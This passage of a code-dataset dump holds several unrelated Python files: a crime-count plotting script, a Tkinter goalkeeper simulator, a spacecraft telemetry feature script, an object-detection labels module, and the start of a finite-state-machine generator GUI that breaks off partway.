Constructs crime frequency over different months\n '''\n vals = com_crime_df['month'].value_counts()\n plt.bar(x=vals.index, height=vals)\n plt.xlabel('Month')\n plt.ylabel('Total Number of Crimes')\n plt.title('Crime Counts by Month for ' + com_area.title())\n filename = 'data/folium_figures/' + com_area.replace(' ', '_') + '_month.png'\n plt.savefig(filename, bbox_inches='tight')\n plt.clf()\n\n\ndef graph_by_season(com_crime_df, com_area):\n '''\n Constructs crime frequency over different seasons\n '''\n vals = com_crime_df['season'].value_counts()\n plt.bar(x=vals.index, height=vals)\n plt.xlabel('Season')\n plt.ylabel('Total Number of Crimes')\n plt.title('Crime Counts by Season for ' + com_area.title())\n filename = 'data/folium_figures/' + com_area.replace(' ', '_') + '_season.png'\n plt.savefig(filename, bbox_inches='tight')\n plt.clf()\n","sub_path":"code/cleaned_dataset_crime.py","file_name":"cleaned_dataset_crime.py","file_ext":"py","file_size_in_byte":4844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"337956269","text":"from tkinter import *\r\nimport shelvE\r\nimport time\r\nimport win32api as win32\r\nimport win32con\r\nimport os\r\nfrom PIL import ImageGrab\r\n\r\n\r\ntutorial = \"\"\"CALIBRAGEM DE TRAVE\\n\r\n 1. Marque a opção \"Ball\" antes de começar\\n\r\n 2. Colocar a bola no chão ao meio da trave e colocar a câmera centralizada, fazendo com que xReal = 0 e yReal = 0\\n\r\n 3. Colocar a bola em frente a trave da esquerda e direita, verificar o valor do xReal no simulador, adicionar os mesmos nos campos adequados\\n\r\n 4. Colocar a bola em frente a trave superior, verificar o valor yReal e adicionar ao campo adequado\\n\r\n 5. Caso ainda falte um pouco para chegar ao ponto correto, adicione ou tire valores baixos (Exemplo: xReal - 10) ao xReal ou yReal, até que ele se encaixe corretamente nas posições desejadas\\n\r\n \"\"\"\r\n\r\ntutorial_verificacao = True\r\ncontPrints = 0\r\n\r\nclass App(object):\r\n def __init__(self):\r\n \"\"\"Classe de criação da aplicação, frames e atributos ( Botoes, campos, textos, checkbuttons ... )\"\"\"\r\n\r\n self.root = Tk()\r\n self.root.title('Goalkeeper Simulator')\r\n #self.root.geometry('700x700')\r\n self.root.resizable(False, False)\r\n self.angulo = 0\r\n\r\n #Cores\r\n self.corGoleiro = '#e2c498'\r\n self.corRede = '#6b6b6b'\r\n self.corBola = '#e26f4f'\r\n\r\n self.xReal = 0\r\n self.yReal = 0\r\n self.x = 0\r\n self.y = 0\r\n self.raio = 0\r\n self.raioDefesa = 60\r\n\r\n #TAMANHO DO SIMULADOR <<<<<<<<<<<<<<<<<<<<<<<<<<< #PADRAO 200x200\r\n self.heightCanvas = 400\r\n self.widthCanvas = 400\r\n self.tamanhoBola = (5*self.heightCanvas) / 200\r\n\r\n #IMPORTANTE <<<<< É O TAMANHO DA TRAVE NA WEBCAM (600x450 PEGA A WEBCAM TODA COMO REFERENCIA)\r\n self.xTotalGol = 600\r\n self.yTotalGol = 450\r\n\r\n #Frame\r\n self.frameGoleiro = Frame(self.root)\r\n self.frameGoleiro.pack()\r\n self.frame1 = Frame(self.root)\r\n self.frame1.pack(side='top')\r\n self.frame2 = Frame(self.root)\r\n self.frame2.pack(side='top')\r\n self.frame3 = Frame(self.root)\r\n self.frame3.pack(side='top')\r\n self.frame4 = Frame(self.root)\r\n self.frame4.pack(side='top', padx=5, pady=10)\r\n\r\n #Canvas\r\n self.canvas = Canvas(self.frameGoleiro, bg='grey', height=self.heightCanvas, width=self.widthCanvas)\r\n self.canvas.pack()\r\n self.escala = self.heightCanvas/200\r\n\r\n #Atributos\r\n #BotaoOn\r\n self.botaoOn = Button(self.frame1, text='On', width=10, bg='#bababa', command=self.comecar)\r\n self.rodando = False\r\n self.botaoOn.pack(pady=10, padx=10, side='left')\r\n #BotaoReset\r\n self.botaoReset = Button(self.frame1, text='Reset', width=10, bg='#bababa', command=self.resetar)\r\n self.botaoReset.pack(side='left')\r\n #BotaoCalibrar\r\n self.botaoCalibrar = Button(self.frame1, text='Calibrar', width=10, bg='#bababa', command=self.calibrar)\r\n self.botaoCalibrar.pack(side='left', padx=10)\r\n #BotaoConfigurarCorBola\r\n self.botaoCor = Button(self.frame1, text='Cor Bola', width=10, bg='#bababa', command=self.calibrarCorBola)\r\n self.botaoCor.pack(side='left')\r\n #CheckButton Bola ligada\r\n self.bolaLigada = False\r\n self.checkbutton = Checkbutton(self.frame1, text='Ball', command=self.habilitarBola)\r\n self.checkbutton.pack(padx=10, pady=10, side='top')\r\n #Entradas de calibragem\r\n self.tituloEsquerda = Label(self.frame2, text='xReal Esquerda:')\r\n self.tituloEsquerda.pack(side='left')\r\n self.xCalibrarTraveEsquerda = Entry(self.frame2, width=5)\r\n self.xCalibrarTraveEsquerda.pack(pady=5, side='left', padx=10)\r\n 
self.tituloDireita = Label(self.frame2, text='xReal Direita:')\r\n self.tituloDireita.pack(side='left')\r\n self.xCalibrarTraveDireita = Entry(self.frame2, width=5)\r\n self.xCalibrarTraveDireita.pack(pady=5, side='left', padx=10)\r\n self.tituloAltura = Label(self.frame2, text='Altura (0 ~ 450):')\r\n self.tituloAltura.pack(side='left')\r\n self.yCalibrarTraveAltura = Entry(self.frame2, width=5)\r\n self.yCalibrarTraveAltura.pack(pady=5, side='top', padx=10)\r\n #Entrada do raio de defesa\r\n self.tituloRaio = Label(self.frame3, text='Raio de defesa (Padrão 60):')\r\n self.tituloRaio.pack(side='left', pady=5, padx=10)\r\n self.CamporaioDefesa = Entry(self.frame3, width=5)\r\n self.CamporaioDefesa.pack(side='left')\r\n self.botaoRaio = Button(self.frame3, text='Enter Raio', bg='#bababa', command=self.validarRaio)\r\n self.botaoRaio.pack(pady=5, padx=10, side='left')\r\n #CheckButton p/ porta serial\r\n self.serialLigada = False\r\n self.checkbuttonSerial = Checkbutton(self.frame3, text='Send in Serial', variable=self.serialLigada, command=self.sendSerial)\r\n self.checkbuttonSerial.pack(side='left')\r\n #Botão p/ abrir o software de reconhecimento\r\n self.botaoOpenSoftware = Button(self.frame4, text='Abrir Software de reconhecimento', bg='#bababa', command=self.abrirSoftwareReconhecimento)\r\n self.botaoOpenSoftware.pack(side='left', padx=10)\r\n #Botão PauseOnGoal\r\n self.pausarNoGolLigado = False\r\n self.botaoPauseOnGoal = Button(self.frame4, text='Printscreen: Off', bg='#d32c2c', command=self.printScreenOnGoal)\r\n self.botaoPauseOnGoal.pack()\r\n\r\n\r\n #Inicio do simulador\r\n self.criarSimulador()\r\n self.root.mainloop()\r\n\r\n def criarSimulador(self):\r\n \"\"\"Criar os elementos principais do canvas no simulador\"\"\"\r\n #Trave\r\n self.canvas.create_rectangle((3*self.escala, 80*self.escala), (200*self.escala, 210*self.escala), fill='white', tag='trave')\r\n self.canvas.create_rectangle((9*self.escala, 86*self.escala), (192*self.escala, 210*self.escala), fill='black', tag='trave')\r\n self.canvas.create_polygon((24*self.escala, 95*self.escala), (180*self.escala, 95*self.escala), (180*self.escala, 210*self.escala), (24*self.escala, 210*self.escala), outline='white', width=2, tag='trave')\r\n self.canvas.create_line((3*self.escala, 80*self.escala), (24*self.escala, 95*self.escala), fill='white', width=3, tag='trave')\r\n self.canvas.create_line((196*self.escala, 83*self.escala), (180*self.escala, 95*self.escala), fill='white', width=3, tag='trave')\r\n\r\n horizontal = 18\r\n vertical = 89\r\n\r\n #Rede\r\n for i in range(20):\r\n self.canvas.create_line((horizontal*self.escala, 95*self.escala), (horizontal*self.escala, 210*self.escala), fill=self.corRede, width=1, tag='trave')\r\n self.canvas.create_line((5*self.escala, vertical*self.escala), (200*self.escala, vertical*self.escala), fill=self.corRede, width=1, tag='trave')\r\n vertical += 10\r\n horizontal += 10\r\n\r\n p1 = 10*self.escala\r\n p2 = 30*self.escala\r\n\r\n for i in range(18):\r\n self.canvas.create_line((p1*self.escala, 80*self.escala), (p2*self.escala, 95*self.escala), fill=self.corRede, width=1, tag='trave')\r\n self.canvas.create_line((24*self.escala, vertical*self.escala), (180*self.escala, vertical*self.escala), fill=self.corRede, width=1, tag='trave')\r\n p1 += 10*self.escala\r\n p2 += 10*self.escala\r\n\r\n #Grama\r\n self.canvas.create_rectangle((88*self.escala, 180*self.escala), (110*self.escala, 205*self.escala), fill='#707070', outline='black')\r\n self.canvas.create_line((0*self.escala, 
200*self.escala), (250*self.escala, 200*self.escala), fill='green', width=(5*self.heightCanvas) / 200)\r\n\r\n #Textos\r\n self.canvas.create_text((35*self.escala, 70*self.escala), text='Trave', fill='white', font=('Verdana', 10, 'bold'))\r\n self.canvas.create_text((60*self.escala, 10*self.escala), text='xReal: {}'.format(self.xReal), fill='white', font=('Verdana', 10, 'bold'), tag='xreal')\r\n self.canvas.create_text((60*self.escala, 30*self.escala), text='yReal: {}'.format(self.yReal), fill='white', font=('Verdana', 10, 'bold'), tag='yreal')\r\n\r\n self.canvas.create_text((140*self.escala, 10*self.escala), text='x: {}'.format(self.x), fill='white', font=('Verdana', 10, 'bold'), tag='x')\r\n self.canvas.create_text((140*self.escala, 30*self.escala), text='y: {}'.format(self.y), fill='white', font=('Verdana', 10, 'bold'), tag='y')\r\n self.canvas.create_text((100*self.escala, 60*self.escala), text='Raio: {}'.format(self.raio), fill='white',font=('Verdana', 10, 'bold'), tag='raio')\r\n\r\n #Goleiro\r\n self.angulo=90\r\n self.goleiro = self.canvas.create_arc((7*self.escala, 75*self.escala), (190*self.escala, 300*self.escala), start=-(170 + (self.angulo + 1)), extent=-20, fill=self.corGoleiro, tag='goleiro')\r\n self.texto = self.canvas.create_text((150*self.escala, 70*self.escala), text='Goleiro: {}º'.format(self.angulo), fill='white', font=('Verdana', 10, 'bold'), tag='textoangulo')\r\n\r\n def calibrarCorBola(self):\r\n \"\"\" Vai abrir o range-detector.py para poder calibrar a cor da bola\r\n o script precisa estar no mesmo diretorio deste programa \"\"\"\r\n\r\n path = os.path.abspath(\"\") + '\\\\range-detector.py'\r\n os.system(f'py {path} -f HSV -w')\r\n\r\n\r\n def abrirSoftwareReconhecimento(self):\r\n \"\"\" Vai abrir o software com o 'os', o script precisa estar no mesmo diretorio deste programa ... 
(goalkeeper.py) \"\"\"\r\n\r\n #path = os.path.abspath(\"\") + '\\\\goalkeeper.py'\r\n #os.system(f'py {path}')\r\n win32.WinExec('goalkeeper.bat', win32con.SW_HIDE)\r\n\r\n def printScreenOnGoal(self):\r\n self.pausarNoGolLigado = not self.pausarNoGolLigado\r\n if self.pausarNoGolLigado:\r\n import time\r\n folderName = time.localtime()\r\n save_path = os.path.abspath(\"\")\r\n os.system(f'mkdir {save_path}\\\\Screenshots\\\\{str(folderName[3])}-{str(folderName[4])}-{str(folderName[5])}')\r\n self.pathScreenshot = save_path + f'\\\\Screenshots\\\\{str(folderName[3])}-{str(folderName[4])}-{str(folderName[5])}'\r\n print('Pause on Goal Ligado')\r\n self.botaoPauseOnGoal['bg'] = '#72d119'\r\n self.botaoPauseOnGoal['text'] = 'Printscreen: On'\r\n else:\r\n print('Pause on Goal Desligado')\r\n self.botaoPauseOnGoal['bg'] = '#d32c2c'\r\n self.botaoPauseOnGoal['text'] = 'Printscreen: Off'\r\n\r\n def calibrar(self):\r\n ''' Vai receber os valores dos campos de calibração e calibrar as traves '''\r\n # Apresentar Tutorial\r\n global tutorial_verificacao\r\n if tutorial_verificacao:\r\n tutorial_verificacao = not tutorial_verificacao\r\n win32.MessageBeep(1)\r\n win32.MessageBox(0, tutorial, 'Tutorial Calibragem')\r\n try:\r\n self.xTotalGol = abs(int(self.xCalibrarTraveEsquerda.get())) + abs(int(self.xCalibrarTraveDireita.get()))\r\n self.yTotalGol = 450 - abs(int(self.yCalibrarTraveAltura.get()))\r\n except:\r\n win32.MessageBeep(1)\r\n win32.MessageBox(0, 'Error: Argumentos em falta...', 'Error')\r\n\r\n else:\r\n try:\r\n self.xTotalGol = abs(int(self.xCalibrarTraveEsquerda.get())) + abs(int(self.xCalibrarTraveDireita.get()))\r\n self.yTotalGol = 450 - abs(int(self.yCalibrarTraveAltura.get()))\r\n except:\r\n win32.MessageBeep(1)\r\n win32.MessageBox(0, 'Error: Argumentos em falta...', 'Error')\r\n\r\n def habilitarBola(self):\r\n \"\"\" Vai ligar a simulação em tempo real da bola, pelo checkbutton 'ball' \"\"\"\r\n self.bolaLigada = not self.bolaLigada\r\n if self.bolaLigada:\r\n self.xbola = 100*self.escala + ((int(self.xReal)*self.escala * 200*self.escala) / self.xTotalGol*self.escala) # 600 -> X total da webcam\r\n self.ybola = 200*self.escala - (int(self.yReal)*self.escala * 200*self.escala) / self.yTotalGol*self.escala # 450 -> Y total da webcam\r\n self.bolaSimulacao = self.canvas.create_oval(self.xbola - self.tamanhoBola,\r\n self.ybola - self.tamanhoBola,\r\n self.xbola + self.tamanhoBola,\r\n self.ybola + self.tamanhoBola,\r\n fill=self.corBola, tag='bola')\r\n else:\r\n self.canvas.delete('bola')\r\n\r\n def resetar(self):\r\n \"\"\" Função do botão reset: Descalibrar tudo, retornar tudo ao padrão \"\"\"\r\n\r\n self.rodando = False\r\n self.angulo = 90\r\n self.botaoOn['text'] = 'On'\r\n self.xTotalGol = 600\r\n self.yTotalGol = 450\r\n self.xReal, self.yReal, self.x, self.y, self.raio, self.raioDefesa = '0', '0', '0', '0', '0', 60\r\n self.canvas.delete('bola')\r\n self.desenhar()\r\n\r\n def comecar(self):\r\n \"\"\" Botao on: Vai dizer se o programa está rodando ou em pause, caso pause ele ira trava na ultima posicao \"\"\"\r\n\r\n self.rodando = not self.rodando\r\n if self.rodando:\r\n self.botaoOn['text'] = 'Pause'\r\n else:\r\n self.botaoOn['text'] = 'On'\r\n self.aplicar()\r\n\r\n def aplicar(self):\r\n \"\"\" Se o programa estiver rodando (def comecar) ele irá fazer o loop com todas as funções necessarias \"\"\"\r\n if self.rodando:\r\n self.update()\r\n self.desenhar()\r\n self.root.after(10, self.aplicar)\r\n\r\n def desenhar(self):\r\n \"\"\" Função que redesenha os 
itens com novas posições e novos dados, Aqui tmb será tirado o printscreen caso ativado \"\"\"\r\n\r\n        self.canvas.itemconfig('goleiro', start=-(170 + (self.angulo + 1)), extent=-20)\r\n        self.canvas.itemconfig('textoangulo', text='Goleiro: {}º'.format(self.angulo))\r\n        self.canvas.itemconfig('xreal', text='xReal: {}'.format(self.xReal))\r\n        self.canvas.itemconfig('yreal', text='yReal: {}'.format(self.yReal))\r\n        self.canvas.itemconfig('x', text='x: {}'.format(self.x))\r\n        self.canvas.itemconfig('y', text='y: {}'.format(self.y))\r\n        self.canvas.itemconfig('raio', text='Raio: {}'.format(self.raio))\r\n        #self.canvas.move('bola', self.xbola, self.ybola)\r\n        if self.bolaLigada:\r\n            global contPrints\r\n            self.canvas.delete(self.bolaSimulacao)\r\n            try:\r\n                if self.raio > 0 and self.raio < self.raioDefesa and int(self.x) > 0 and int(self.y) > 0:\r\n                    \"\"\"Caso o raio seja menor do que o indicado, a bola ficara verde e será habilitada a defesa\"\"\"\r\n                    self.bolaSimulacao = self.canvas.create_oval(self.xbola - self.tamanhoBola,\r\n                                                                 self.ybola - self.tamanhoBola,\r\n                                                                 self.xbola + self.tamanhoBola,\r\n                                                                 self.ybola + self.tamanhoBola, fill='green',\r\n                                                                 tag='bola')\r\n                    print('Defender: {}'.format(self.angulo))\r\n\r\n                    if self.pausarNoGolLigado and self.yReal > -10:\r\n                        win32.MessageBeep(1)\r\n                        img = ImageGrab.grab()\r\n                        #img.show()\r\n                        try:\r\n                            #Getting path of the program\r\n                            img.save(\"{}\\\\goalPhoto{}.jpg\".format(self.pathScreenshot, contPrints))\r\n                            contPrints += 1\r\n\r\n                        except:\r\n                            win32.MessageBox(0, 'Caminho inválido', 'Erro Print')\r\n                            self.comecar()\r\n\r\n                        time.sleep(0.3)\r\n\r\n                else:\r\n                    self.bolaSimulacao = self.canvas.create_oval(self.xbola - self.tamanhoBola,\r\n                                                                 self.ybola - self.tamanhoBola,\r\n                                                                 self.xbola + self.tamanhoBola,\r\n                                                                 self.ybola + self.tamanhoBola, fill=self.corBola,\r\n                                                                 tag='bola')\r\n            except:\r\n                pass\r\n\r\n    def validarRaio(self):\r\n        \"\"\" Função do botao do RAIO, que vai receber o novo raio de atuação \"\"\"\r\n        self.raioDefesa = int(self.CamporaioDefesa.get())\r\n\r\n    def update(self):\r\n        \"\"\" Função que irá atualizar os dados para poder passar para a parte do redesenho, recebe os dados do banco shelve e passa para as outras funções \"\"\"\r\n\r\n        try:\r\n            banco = shelve.open('dados.db')\r\n            #Angulo Refined\r\n            self.angulo = int(banco.get('angulo'))\r\n            cinco = int(self.angulo / 5) #Devolve os angulos de 5 em cinco\r\n            self.angulo = cinco * 5\r\n\r\n            if self.angulo <= 5 and self.angulo > -20:\r\n                self.angulo = 5\r\n            elif self.angulo <= -170 or self.angulo > 175:\r\n                self.angulo = 175\r\n            elif self.angulo <= -20:\r\n                self.angulo = 90\r\n\r\n            self.xReal = banco.get('xreal')\r\n            self.yReal = banco.get('yreal')\r\n            self.x = banco.get('x')\r\n            self.y = banco.get('y')\r\n            self.raio = banco.get('raio')\r\n            self.xbola = (100 + ((int(self.xReal) * 200) / self.xTotalGol))*self.escala\r\n            self.ybola = (200 - ((int(self.yReal) * 200) / self.yTotalGol))*self.escala\r\n            #print('angulo: {}'.format(self.angulo))\r\n\r\n            if self.xReal != None and self.yReal != None and self.x != None and self.y != None and self.raio != None:\r\n                self.xReal = int(self.xReal)\r\n                self.yReal = int(self.yReal)\r\n                self.x = int(self.x)\r\n                self.y = int(self.y)\r\n                self.raio = int(self.raio)\r\n            else:\r\n                #print('Refazendo update')\r\n                self.update()\r\n        except:\r\n            pass\r\n        finally:\r\n            #time.sleep(0.1)\r\n            try:\r\n                banco.close()\r\n            except:\r\n                #print('Evitando erro nao fechamento do banco')\r\n                pass\r\n\r\n    def sendSerial(self):\r\n        #TODO Implementação do envio de angulo para arduino.\r\n        
self.serialLigada = not self.serialLigada\r\n if self.serialLigada:\r\n print('Serial Ligada')\r\n else:\r\n print('Serial desativada')\r\n pass\r\n\r\nif __name__ == '__main__':\r\n App()\r\n\r\n\r\n\r\n","sub_path":"goalkeeper-simulator.py","file_name":"goalkeeper-simulator.py","file_ext":"py","file_size_in_byte":18891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
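The simulator's update() polls a shelve database ('dados.db') that an external recognition script is expected to populate. A minimal sketch of that producer side, assuming goalkeeper.py simply writes string values under the same keys update() reads; the publish helper name is hypothetical:

import shelve

def publish(angle, x_real, y_real, x, y, radius):
    # hypothetical writer side of the dados.db handshake polled by update()
    db = shelve.open('dados.db')
    try:
        db['angulo'] = str(angle)
        db['xreal'] = str(x_real)
        db['yreal'] = str(y_real)
        db['x'] = str(x)
        db['y'] = str(y)
        db['raio'] = str(radius)
    finally:
        db.close()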
+{"seq_id":"354526735","text":"\nimport sys\nimport os\nfrom datetime import datetime\n\nsys.path.append(\"../\")\nfrom utils.utils import *\n\nfolder = config.features_folder\nif not os.path.exists(folder):\n os.makedirs(folder)\n\n\n# Function to read a csv file and resample to hourly\ndef parse_dmop(filename):\n df = pd.read_csv(config.data_folder + '/' + filename)\n df = convert_time(df)\n df = df.set_index('ut_ms')\n return df\n\n\ndmop_train1 = parse_dmop('/train_set/context--2008-08-22_2010-07-10--dmop.csv')\ndmop_train2 = parse_dmop('/train_set/context--2010-07-10_2012-05-27--dmop.csv')\ndmop_train3 = parse_dmop('/train_set/context--2012-05-27_2014-04-14--dmop.csv')\n\ndmop_train = pd.concat([dmop_train1, dmop_train2, dmop_train3])\n\ndmop_test = parse_dmop('/test_set/context--2014-04-14_2016-03-01--dmop.csv')\n\ndmop_all = pd.concat([dmop_train, dmop_test])\n\n\n# Split numeric values and subsystem\ndmop_split_df= dmop_all.subsystem.str.split('.',expand=True).rename(columns={0:'description',1:\"param\"})\n# split the subsystem/command pattern\ndmop_split_df['subsystem'] = dmop_split_df.description.str[0:4]\ndmop_split_df['command'] = dmop_split_df.description.str[4:]\n\n#\n# ATMB - Subsystem\n# ----------------\n\n# Commands for atmb\nATMB_commands = dmop_split_df[(dmop_split_df.subsystem == \"ATMB\")].command.value_counts()\n\n# Extract the \"kelvins\" per event\nATMB_df_events = dmop_split_df[dmop_split_df['subsystem']=='ATMB']\nATMB_df_events.loc[:,'kelvins'] = ATMB_df_events.command.str[0:3].astype(int)\n\n# feature sampled by hour \nATMB_df_events.kelvins.resample('h').ffill().fillna(method='bfill').to_pickle(config.features_folder + \"ATMB_commands.pkl\")\nATMB_df_events.kelvins.resample('h').ffill().fillna(method='bfill').to_csv(config.features_folder + \"ATMB_commands.csv\")","sub_path":"src/features/feature_dmop_atmb_sub.py","file_name":"feature_dmop_atmb_sub.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"332688653","text":"import numpy as np\n\nfrom object_detection.utils.np_box_list import BoxList\nfrom object_detection.utils.np_box_list_ops import (\n prune_non_overlapping_boxes, clip_to_window, change_coordinate_frame,\n concatenate, scale, multi_class_non_max_suppression, _copy_extra_fields)\n\nfrom rv2.core.box import Box\nfrom rv2.core.labels import Labels\n\n\ndef geojson_to_labels(geojson, crs_transformer):\n \"\"\"Extract boxes and related info from GeoJSON file.\"\"\"\n features = geojson['features']\n boxes = []\n class_ids = []\n scores = []\n\n for feature in features:\n # Convert polygon to pixel coords and then convert to bounding box.\n polygon = feature['geometry']['coordinates'][0]\n polygon = [crs_transformer.web_to_pixel(p) for p in polygon]\n xmin, ymin = np.min(polygon, axis=0)\n xmax, ymax = np.max(polygon, axis=0)\n boxes.append(Box(ymin, xmin, ymax, xmax))\n\n properties = feature.get('properties', {})\n class_ids.append(properties.get('class_id', 1))\n scores.append(properties.get('score', 1.0))\n\n boxes = np.array([box.npbox_format() for box in boxes], dtype=float)\n class_ids = np.array(class_ids)\n scores = np.array(scores)\n labels = ObjectDetectionLabels(boxes, class_ids, scores=scores)\n return labels\n\n\ndef labels_to_geojson(labels, crs_transformer, class_map):\n boxes = labels.get_boxes()\n class_ids = labels.get_class_ids().tolist()\n scores = labels.get_scores().tolist()\n\n features = []\n for box_ind, box in enumerate(boxes):\n polygon = box.geojson_coordinates()\n polygon = [crs_transformer.pixel_to_web(p) for p in polygon]\n\n class_id = class_ids[box_ind]\n class_name = class_map.get_by_id(class_id).name\n score = scores[box_ind]\n\n feature = {\n 'type': 'Feature',\n 'geometry': {\n 'type': 'Polygon',\n 'coordinates': [polygon]\n },\n 'properties': {\n 'class_id': class_id,\n 'class_name': class_name,\n 'score': score\n }\n }\n features.append(feature)\n\n return {\n 'type': 'FeatureCollection',\n 'features': features\n }\n\n\ndef inverse_change_coordinate_frame(boxlist, window):\n scaled_boxlist = scale(boxlist, window.get_height(), window.get_width())\n npboxes = np.round(scaled_boxlist.get())\n npboxes += [window.ymin, window.xmin, window.ymin, window.xmin]\n boxlist_new = BoxList(npboxes)\n _copy_extra_fields(boxlist_new, boxlist)\n return boxlist_new\n\n\nclass ObjectDetectionLabels(Labels):\n def __init__(self, npboxes, class_ids, scores=None):\n self.boxlist = BoxList(npboxes)\n self.boxlist.add_field('classes', class_ids)\n if scores is not None:\n self.boxlist.add_field('scores', scores)\n\n @staticmethod\n def from_boxlist(boxlist):\n scores = boxlist.get_field('scores') \\\n if boxlist.has_field('scores') else None\n return ObjectDetectionLabels(\n boxlist.get(), boxlist.get_field('classes'), scores)\n\n @staticmethod\n def from_geojson(geojson, crs_transformer):\n return geojson_to_labels(geojson, crs_transformer)\n\n @staticmethod\n def make_empty():\n npboxes = np.empty((0, 4))\n labels = np.empty((0,))\n scores = np.empty((0,))\n return ObjectDetectionLabels(npboxes, labels, scores)\n\n def get_subset(self, window, ioa_thresh=1.0):\n window_npbox = window.npbox_format()\n window_boxlist = BoxList(np.expand_dims(window_npbox, axis=0))\n boxlist = prune_non_overlapping_boxes(\n self.boxlist, window_boxlist, minoverlap=ioa_thresh)\n boxlist = clip_to_window(boxlist, window_npbox)\n boxlist = change_coordinate_frame(boxlist, window_npbox)\n return ObjectDetectionLabels.from_boxlist(boxlist)\n\n def get_boxes(self):\n 
return [Box.from_npbox(npbox) for npbox in self.boxlist.get()]\n\n def get_coordinates(self):\n return self.boxlist.get_coordinates()\n\n def get_npboxes(self):\n return self.boxlist.get()\n\n def get_scores(self):\n if self.boxlist.has_field('scores'):\n return self.boxlist.get_field('scores')\n return None\n\n def get_class_ids(self):\n return self.boxlist.get_field('classes')\n\n def __len__(self):\n return self.boxlist.get().shape[0]\n\n def concatenate(self, window, labels):\n boxlist_new = concatenate([\n self.boxlist,\n inverse_change_coordinate_frame(labels.boxlist, window)])\n return ObjectDetectionLabels.from_boxlist(boxlist_new)\n\n def prune_duplicates(self, score_thresh, merge_thresh):\n max_output_size = 1000000\n boxlist_new = multi_class_non_max_suppression(\n self.boxlist, score_thresh, merge_thresh, max_output_size)\n # Add one because multi_class_nms outputs labels that start at zero\n # instead of one like in the rest of the system. This is a kludge.\n class_ids = boxlist_new.get_field('classes')\n class_ids += 1\n return ObjectDetectionLabels.from_boxlist(boxlist_new)\n\n def to_geojson(self, crs_transformer, class_map):\n return labels_to_geojson(self, crs_transformer, class_map)\n","sub_path":"src/rv2/labels/object_detection_labels.py","file_name":"object_detection_labels.py","file_ext":"py","file_size_in_byte":5297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
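inverse_change_coordinate_frame undoes change_coordinate_frame: window-relative boxes in [0, 1] are scaled by the window size, rounded, and offset by the window origin. The arithmetic in isolation, assuming the (ymin, xmin, ymax, xmax) layout used throughout the module:

import numpy as np

def to_global(npboxes, window):
    # npboxes: N x 4 array of (ymin, xmin, ymax, xmax) relative to the window
    ymin, xmin, ymax, xmax = window
    h, w = ymax - ymin, xmax - xmin
    scaled = np.round(npboxes * [h, w, h, w])
    return scaled + [ymin, xmin, ymin, xmin]

print(to_global(np.array([[0.0, 0.0, 0.5, 0.5]]), (100, 200, 300, 400)))
# [[100. 200. 200. 300.]]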
+{"seq_id":"469847351","text":"try:\n # for Python2\n from Tkinter import * ## notice capitalized T in Tkinter\nexcept ImportError:\n # for Python3\n from tkinter import *\n\nfrom FSM_class import *\n\nfrom os.path import expanduser\nhome = expanduser(\"~\")\n\ndef refresh(self,frame,inputs):\n\n # inputs = [\n # (\"Min number of bits\", \"vmin\", Entry, 1),\n # (\"Max number of bits\", \"vmax\", Entry, 3),\n # (\"Seed\", \"seed\", Entry, \"mySeed\"),\n # (\"Number of states\", \"states\", Entry, 5),\n # (\"Indeterminacy\", \"ind\", Scale, 0.0),\n # (\"Loops\", \"loops\", Scale, 0.0)\n # ]\n\n n = 2\n\n memo = []\n\n for text, value, f, default in inputs:\n label = Label(frame, text=text, bg=self.MAIN_COLOR)\n label.grid(row=n,column=3,sticky=E)\n memo.append(label)\n if f == Entry:\n if type(default) is int:\n self.results[value] = IntVar()\n else:\n self.results[value] = StringVar()\n t1 = f(frame, textvariable=self.results[value])\n t1.grid(row=n,column=4)\n if f == Scale:\n self.results[value] = IntVar()\n f(frame, orient=HORIZONTAL, sliderlength=20,variable=self.results[value], bg=self.MAIN_COLOR).grid(row=n,column=4)\n\n self.results[value].set(default)\n n += 1\n\n return memo\n\n\nclass App:\n\n def __init__(self,master):\n\n self.MAIN_COLOR = \"#ffffff\"\n self.SEC_COLOR = \"#fff\"\n\n self.frame = Frame(master, bg=self.MAIN_COLOR)\n self.frame.pack()\n\n try:\n self.input = self.input\n except AttributeError:\n self.input = [\n (\"Input (bits)\", \"vmin\", Entry, 1),\n (\"Output (bits)\", \"vmax\", Entry, 3),\n (\"Seed\", \"seed\", Entry, \"mySeed\"),\n (\"Number of states\", \"states\", Entry, 5),\n (\"Loops (%)\", \"loops\", Scale, 0.0),\n (\"Jumps (%)\", \"jumps\", Scale, 0.0)\n ]\n\n Label(\n self.frame, padx=10, pady=10 ,relief=RIDGE, text=\"FSpyChine\",\n justify=CENTER, fg=\"#00aa00\", background=self.SEC_COLOR).grid(row=0,columnspan=5)\n\n radios = [\n (\"Random\", 1),\n (\"Sequential\", 2),\n (\"Patterns\", 3)\n ]\n self.v = IntVar()\n self.v.set(1)\n n=2\n for text, value in radios:\n b = Radiobutton(self.frame, text=text, variable=self.v, value=value, command=self.radio_action, bg=self.MAIN_COLOR)\n b.grid(row=n, column=0, sticky=W)\n n += 1\n\n self.results = {}\n\n\n self.memo = refresh(self,self.frame,self.input)\n\n\n def exportKiss2():\n method_name = \"fsm_\" + str(self.v.get())\n method = getattr(self, method_name)\n return method()\n\n Label(self.frame, text=\"Path to export\", bg=self.MAIN_COLOR).grid(row=6,column=0,sticky=E)\n self.results[\"path\"] = StringVar()\n self.results[\"path\"].set(home)\n\n t1 = Entry(self.frame, textvariable=self.results[\"path\"])\n t1.grid(row=6,column=1)\n\n b1 = Button(master, text=\"Export kiss2\", command=exportKiss2)\n # b1.pack()\n b1.pack()\n\n def image():\n method_name = \"image_\" + str(self.v.get())\n method = getattr(self, method_name)\n return method()\n\n b2 = Button(master, text=\"Export image\", command=image)\n b2.pack()\n\n def getPatterns():\n method_name = \"getPatterns\"\n method = getattr(self, method_name)\n return method()\n\n b3 = Button(master, text=\"Get patterns\", command=getPatterns)\n b3.pack()\n self.n = 0\n\n def getPatterns(self):\n if self.v.get() == 3:\n\n r = self.results\n x = FSM(\n seed = r[\"seed\"].get(),\n input=r[\"vmin\"].get(),\n output=r[\"vmax\"].get(),\n states=r[\"states\"].get(),\n loops=r[\"loops\"].get())\n x.build(pattern)\n x.getPatterns(r[\"path\"].get())\n\n else:\n tkMessageBox.showinfo(\"This is not possible\", \"Sorry, but you must use this with a pattern 